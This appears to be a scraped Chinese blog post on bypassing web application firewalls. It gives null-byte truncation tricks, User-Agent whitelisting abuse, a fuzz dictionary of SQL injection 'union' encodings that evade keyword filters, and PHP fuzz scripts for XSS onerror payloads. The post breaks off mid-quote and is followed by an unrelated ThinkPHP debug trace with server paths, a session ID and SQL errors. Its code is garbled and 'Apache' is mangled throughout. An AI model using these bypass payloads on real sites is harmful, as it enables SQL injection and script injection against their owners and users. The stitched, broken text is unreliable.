WAF分类:
1.网络层类
2.最常见且容易部署的应用层类 (部署在APAC++HE之前,APAC++HE之后)
应用层WAF – 利用WAF自身缺陷和MySQL语法特性并结合实际绕过:
WAF最常见检测方式:关键词检测 例如 如果出现 [空格]union[空格] 这样的SQL语句则视为恶意请求,丢弃这个数据包,XSS代码同理。
常见的绕过类型:
类型1:
数据包 -> WAF(利用string存储请求参数,解码后检测)-> APAC++HE
C++语言等利用string等储存结构存储请求,在解码时,%00会成为 NULL 从而截断接下去的请求内容
因此例如 ?id=1%00%20and%201=1 就成为了 ?id=1 从而绕过WAF检测
类型2:
数据包 -> WAF ->APAC++HE
绕过逻辑:
WAF对某些User-Agent特殊放行(如百度spider 的UA)
WAF对某些POST包特殊放行(文件上传包)
类型3:
数据包 -> WAF ->APAC++HE
利用mysql的语法特性和html代码的特殊书写方式、浏览器的渲染方式绕过。由于实际***测试过程中对WAF的实际检测逻辑并不清楚,所以利用fuzz是最好的方法,这也是WAF最常见的绕过方法。
FUZZ字典:
%a0union%a0 (WAF中正则表达式 \s 并不能匹配 %a0 但MYSQL视之为 空格)
%0aunion%0a
%0bunion%0b (WAF中正则表达式 \s \t 并不能识别匹配 %0b)
%09union%09
/**/union/**/
%0dunion%0d
/*%e4*/union/*%e4*/(UTF8中的半个中文 正则表达式中任意匹配符(.)不能匹配该内容)
`version`() (MYSQL语法特性 函数可以书写成 `函数名`())
/*!union*/
8E0union (MYSQL语法特性,检测为浮点数后语境结束,视为空格,下2同)
8.0union
\Nunion
.1union/*.1*/
...
XSS类的一个fuzz实例:
《Fuzz 
来检测 onerror 前可以无缝连接怎样的字符》
编写fuzzz.php 和 fuzz.php 代码如下
Fuzzz.php:
$urlhex=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'];
$i=0;
$ii=0;
for ($i=0; $i < 16 ; $i++) {
for ($ii=0; $ii < 16; $ii++) {
$hex = $urlhex[$i] . $urlhex[$ii];
$realhex = '%' .$urlhex[$i] . $urlhex[$ii];
echo "";
}
}
?>
Fuzz.php:
$code = $_GET['c'];
$cc = $_GET['d'];
?>
onerror="alert('')">
运行Fuzzz.php 进行自动fuzz,结果为:
0c,0d,2f,0a,20,09
1506031300c24c8e0557b05eb0.jpg
同理可以fuzz出各种标签的其他位置可以插入的特殊字符。
附SQL语句空白符FUZZ结果:
SQLite3:0A,0D,0C++,09,20
MySQL5:09,0A,0B,0C++,0D,A0,20
PosgresSQL:0A,0D,0C++,09,20
Oracle_11g:00,0A,0D,0C++,09,20
MSSQL:01,02,03,04,05,06,07,08,09,0A,0B,0C++,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C++,1D,1E,1F,20
类型4:
数据包 -> WAF ->APAC++HE
这是WAF无法考虑到的…
多次恶意代码检测和处理 留下的隐患:
例子(已修复):
漏洞名称:crm2.qq.com XSS
提交时间:2015-03-30 13:39:31
“这个时候就遇到了你们的迷之waf,
基本
文件
流程
错误
SQL
调试
- 请求信息 : 2026-05-19 21:38:58 HTTP/1.1 GET : /article/jecopd.html
- 运行时间 : 3.0246s ( Load:0.0069s Init:2.3139s Exec:0.6935s Template:0.0103s )
- 吞吐率 : 0.33req/s
- 内存开销 : 2,232.42 kb
- 查询信息 : 12 queries 5 writes
- 文件加载 : 36
- 缓存信息 : 0 gets 0 writes
- 配置加载 : 130
- 会话信息 : SESSION_ID=pk0mep6bg30hfkqgc9coiprbh1
- /www/wwwroot/tsicrk.com/index.php ( 1.09 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/ThinkPHP.php ( 4.61 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Think.class.php ( 12.26 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Storage.class.php ( 1.37 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Storage/Driver/File.class.php ( 3.52 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Mode/common.php ( 2.82 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Common/functions.php ( 53.56 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Hook.class.php ( 4.01 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/App.class.php ( 13.49 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Dispatcher.class.php ( 14.79 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Route.class.php ( 13.36 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Controller.class.php ( 11.23 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/View.class.php ( 7.59 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Behavior/BuildLiteBehavior.class.php ( 3.68 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Behavior/ParseTemplateBehavior.class.php ( 3.88 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Behavior/ContentReplaceBehavior.class.php ( 1.91 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Conf/convention.php ( 11.15 KB )
- /www/wwwroot/tsicrk.com/App/Common/Conf/config.php ( 2.14 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Lang/zh-cn.php ( 2.55 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Conf/debug.php ( 1.49 KB )
- /www/wwwroot/tsicrk.com/App/Home/Conf/config.php ( 0.31 KB )
- /www/wwwroot/tsicrk.com/App/Home/Common/function.php ( 3.33 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Behavior/ReadHtmlCacheBehavior.class.php ( 5.62 KB )
- /www/wwwroot/tsicrk.com/App/Home/Controller/ArticleController.class.php ( 6.02 KB )
- /www/wwwroot/tsicrk.com/App/Home/Controller/CommController.class.php ( 1.60 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Model.class.php ( 60.11 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Db.class.php ( 32.43 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Db/Driver/Pdo.class.php ( 16.74 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Cache.class.php ( 3.83 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Cache/Driver/File.class.php ( 5.87 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Template.class.php ( 28.16 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Template/TagLib/Cx.class.php ( 22.40 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Template/TagLib.class.php ( 9.16 KB )
- /www/wwwroot/tsicrk.com/App/Runtime/Cache/Home/7540f392f42b28b481b30614275e4e55.php ( 17.71 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Behavior/WriteHtmlCacheBehavior.class.php ( 0.97 KB )
- /www/wwwroot/tsicrk.com/ThinkPHP/Library/Behavior/ShowPageTraceBehavior.class.php ( 5.24 KB )
- [ app_init ] --START--
- Run Behavior\BuildLiteBehavior [ RunTime:0.000006s ]
- [ app_init ] --END-- [ RunTime:0.000040s ]
- [ app_begin ] --START--
- Run Behavior\ReadHtmlCacheBehavior [ RunTime:0.000404s ]
- [ app_begin ] --END-- [ RunTime:0.000435s ]
- [ view_parse ] --START--
- [ template_filter ] --START--
- Run Behavior\ContentReplaceBehavior [ RunTime:0.000058s ]
- [ template_filter ] --END-- [ RunTime:0.000081s ]
- Run Behavior\ParseTemplateBehavior [ RunTime:0.006679s ]
- [ view_parse ] --END-- [ RunTime:0.006711s ]
- [ view_filter ] --START--
- Run Behavior\WriteHtmlCacheBehavior [ RunTime:0.000158s ]
- [ view_filter ] --END-- [ RunTime:0.000172s ]
- [ app_end ] --START--
- 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') LIMIT 1' at line 1
[ SQL语句 ] : SELECT `id`,`pid`,`navname` FROM `cx_nav` WHERE ( id= ) LIMIT 1
- 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') LIMIT 1' at line 1
[ SQL语句 ] : SELECT `id`,`navname` FROM `cx_nav` WHERE ( id= ) LIMIT 1
- 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1
[ SQL语句 ] : SELECT `id`,`navname` FROM `cx_nav` WHERE ( pid= )
- [8] Undefined index: pid /www/wwwroot/tsicrk.com/App/Home/Controller/ArticleController.class.php 第 47 行.
- [8] Undefined index: db_host /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Db.class.php 第 120 行.
- [8] Undefined index: db_port /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Db.class.php 第 121 行.
- [8] Undefined index: db_name /www/wwwroot/tsicrk.com/ThinkPHP/Library/Think/Db.class.php 第 122 行.
3.0246s
